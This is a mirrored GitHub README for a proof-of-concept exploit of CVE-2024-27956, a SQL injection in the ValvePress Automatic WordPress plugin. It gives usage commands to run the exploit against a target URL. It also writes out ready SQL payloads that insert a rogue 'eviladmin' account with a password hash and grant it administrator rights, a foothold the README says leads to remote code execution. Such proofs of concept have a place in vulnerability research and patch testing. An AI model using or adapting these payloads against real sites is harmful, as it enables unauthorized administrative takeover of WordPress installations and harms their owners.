Git Product home page Git Product logo

cve-2024-27956-rce's Introduction

CVE-2024-27956-RCE

A PoC for CVE-2024-27956, a SQL Injection in ValvePress Automatic plugin. This PoC exploit the vulnerability creating a user in the target and giving Administrator rights. Being an administrator in wordpress can lead to Remote Code Execution.

Usage

git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com

Payloads

SQL Injection payload to create a user: 
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')

Giving admin rights:

q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}

In the q parameter, we can pass our entire query and then it will be executed.

image The user input is executed directly without any kind of restriction or sanitization.

PoC

cve-2024-27956-rce's People

Contributors

diego-tella avatar

Stargazers

avatar yacth_Mon avatar Wenn avatar avatar ik5 avatar Martin Lechêne avatar Katarzyna Mazur avatar Ryan Gusti Nugraha avatar avatar avatar Zongo Tégawendé Achille Caleb avatar avatar WL avatar Beshoy Ashraf avatar avatar Ron avatar avatar gadoi avatar avatar avatar avatar RR3D avatar Lưu Việt Hoàng avatar A-F avatar silvercow02 avatar ilhamrisky avatar avatar avatar Nirwansyah Ramdhani avatar anis bouchagraoui avatar G. Enkh-Amar avatar avatar Pat Alcala avatar Rizky Prasetya avatar avatar pavan kumar avatar Nicolas Vincent avatar avatar Anirudh patki avatar Shashwat Singh avatar Yiuwai Je avatar avatar NN avatar Tien Manh avatar avatar avatar avatar avatar avatar Buyzed Hossain Akash avatar ძεՏκƦαʍ⸙ avatar Behlül Şahin avatar avatar DummyKitty avatar avatar avatar avatar canoztas avatar Placido avatar Tot666 avatar avatar avatar Emad Shanab avatar r4ds3c avatar George Maina {{@crypt0g30rgy}} avatar avatar Khaled Mohamed avatar bash avatar avatar donttellmeimcute avatar Tom Hackshaw avatar Krooxk avatar avatar fvane avatar Morgana Garcia avatar

Watchers

avatar avatar

Forkers

nfttkcauzy imbas007 oit7090 elbiradorr untillnesss jackhallloween21 bouchagraoui zha0 faizalanwar haihpse150218 saifulabidin risuncode ahricat indonumberone dannymas juniantowicaksono06 rjpaje sikhol fahim-86 vnpresent88 dengkedu stenlyandika oliver0804

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.